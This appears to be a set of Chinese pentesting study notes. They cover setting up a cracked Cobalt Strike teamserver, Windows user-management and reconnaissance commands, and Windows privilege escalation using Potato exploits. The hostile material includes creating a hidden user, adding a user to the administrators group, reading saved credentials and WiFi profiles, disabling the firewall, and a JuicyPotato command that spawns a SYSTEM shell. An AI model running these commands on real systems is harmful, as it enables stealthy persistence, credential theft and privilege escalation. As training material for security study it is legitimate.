1.安装CS(CobaltStrike)
运行所需环境
运行CS需要jdk支持(客户端和服务端都需要)!!!
Windows:Java | Oracle(java官网)
Linux:
apt install openjdk-18-jdk
安装步骤
cs官网:Adversary Simulations and Red Team Operations | Cobalt Strike | Core Security
我这里安装使用特供资源汉化版本(在网上可以找资源)
下载解压文件,可以看到文件内包含两个文件夹
客户端和服务端
这里我将服务端部署在VPS上
将Server文件打包上传到vps
这里使用Termius的文件管理将文件从主机上传到vps
进入vps可以查看文件上传成功
现在开始配置服务端
输入以下指令启动配置服务端
chmod +x teamserver
chmod +x TeamServerImage
./teamserver 47.109.183.103 {服务器登录密码}
服务端成功启动
服务端完成,现在开始安装客户端
打开client文件,点击该文件打开即可
配置连接信息登录连接即可
2.总结用户组和用户、windows信息搜集命令
Windows用户组&用户
windows新建用户:计算机管理->本地用户和组->用户->右键新用户
命令行创建用户,明文输入密码:
net user username password /add
删除用户:
net user username password /del
隐藏用户:
net user username$ password
(用户名后加$,此时用net user看不见)新建用户组:
net localgroup gname /add
删除用户组:
net localgroup gname /del
添加用户到组:
net localgroup uname gname /add
从组中删除用户:
net localgroup uname gname /del
(提权)将用户添加到管理员组:
net localgroup administrator uname /add
Windows信息收集
系统信息搜集
whoami
:查看当前用户。
net user
:查看所有用户。
systeminfo
:查看系统信息,包括操作系统名称、版本、补丁信息等。
ipconfig /all
:查看网络配置信息,包括主机名、IP地址、DNS服务器等。
route print
:查看路由表信息。
wmic OS get Caption,CSDVersion,OSArchitecture,Version
:使用WMI(Windows Management Instrumentation)命令查询操作系统的版本、架构等信息。
进程和服务信息搜集
tasklist /svc
:查看进程及对应的服务名。
wmic service list brief
:查询本机服务信息。
netstat -ano
:查看端口开放情况及其对应的进程ID。
wmic process list brief
:列出当前运行的进程及其简要信息。
用户权限和组信息搜集
net user
:显示主机的电脑用户列表。net user administrator
:显示管理员用户组的信息。whoami
:显示当前用户及权限信息。query user
(仅限Windows专业版):查看当前在线用户,包括管理员是否在线。net localgroup administrators
:查看管理员组成员。net user /domain
:在域环境中,查看所有域用户。net group /domain
:在域环境中,查看所有域用户组列表。
网络共享和会话信息搜集
net share
:查看本地共享资源。
net use
:查看IPC连接情况。
net view
:查看匿名共享情况或域内机器列表。
防火墙和登录凭证信息搜集
netsh firewall show state
:查看防火墙状态。
cmdkey /l
:查看当前保存的登录凭证。
netsh advfirewall show allprofiles
:查看Windows防火墙的所有配置文件的状态。
netsh firewall show config
:显示防火墙的详细配置。
netsh advfirewall set allprofiles state off
(需管理员权限):关闭Windows防火墙(适用于Windows Server 2003之后的版本)。
密码和敏感信息搜集
netsh wlan show profiles
:查看连接过的WiFi名称。
dir /a %userprofile%\AppData\Local\Microsoft\Credentials*
:查看RDP连接凭证等敏感信息。
其他信息收集
net view
:查看局域网内其他主机名(需要相应权限)。
net share
:查看本地计算机上开启的共享。
set
:不加参数时显示系统环境变量及其值。
dir /a /s /b "网站目录config" > 1.txt
:搜索特定目录下所有配置文件,并将结果保存到文本文件中(需要替换“网站目录”为实际路径)。
3.总结手工提权思路,使用土豆进行提权
手工提权
补丁筛选:bitsadmin/wesng: Windows Exploit Suggester - Next Generation (github.com)
使用方法
在目标主机上执行systeminfo,复制输出信息到本机
在本机执行以下命令
python wes.py systeminfo.txt --color
python wes.py systeminfo.txt --color -i "Elevation of Privilege"
EXP获取
GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合
GitHub - nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.
Exploit-DB / Exploits + Shellcode + GHDB · GitLab
Windows手工提权(Privilege Escalation)思路:
1.利用系统漏洞:
- 查找和利用系统或应用程序的已知漏洞:使用工具如ExploitDB查找漏洞,并测试是否存在可利用的漏洞。
2.权限配置错误:
- 检查文件和目录权限:使用icacls命令查看敏感文件和目录的权限,寻找不当配置(如写入权限过宽)来进行提权。
- 检查服务配置:使用sc qc [service]查看服务的配置,寻找服务可执行文件路径是否可被修改。
3.利用弱口令:
- 暴力破解或枚举密码:通过暴力破解弱密码或列举常见的用户名和密码组合进行提权。
4.利用未授权访问:
- 利用计划任务:查看并修改计划任务(schtasks /query),寻找可以利用的任务进行提权。
- 利用登录脚本:查看用户的登录脚本(例如在%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup目录中),寻找可以修改的地方。
5.利用已知的漏洞和恶意软件:
- 利用已知漏洞的工具:使用已知的提权工具(如JuicyPotato、BeRoot)进行测试和利用。
6.环境变量和路径问题:
- 检查环境变量:查看系统环境变量(set命令),寻找可以被修改的路径或变量以实现提权。
- 利用路径优先级:如果应用程序在PATH中查找执行文件,可以利用这一点通过创建恶意的可执行文件来实现提权。
7.查找系统配置文件:
- 查看系统配置文件:检查系统配置文件(如注册表项)中的配置,寻找可能的提权机会。
土豆提权
土豆家族
https://github.com/BeichenDream/BadPotato
https://github.com/BeichenDream/GodPotato
https://github.com/CCob/SweetPotato
https://github.com/klezVirus/CandyPotato
https://github.com/antonioCoco/RoguePotato
https://github.com/S3cur3Th1sSh1t/MultiPotato
https://github.com/crisprss/RasmanPotato
https://github.com/wh0amitz/PetitPotato
https://github.com/antonioCoco/JuicyPotatoNG
https://github.com/BeichenDream/PrintNotifyPotato
https://github.com/Prepouce/CoercedPotato
土豆提权实践
juicy-potato
查看本地用户的权限,是否具有SeImpersonate或SeAssignPrimaryToken权限
查看RPC默认端口是否为135:netstat -abno
最终提权命令如下:C:\wmpub\JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c "{6d18ad12-bde3-4393-b311-099c346e6df9}"
提权成功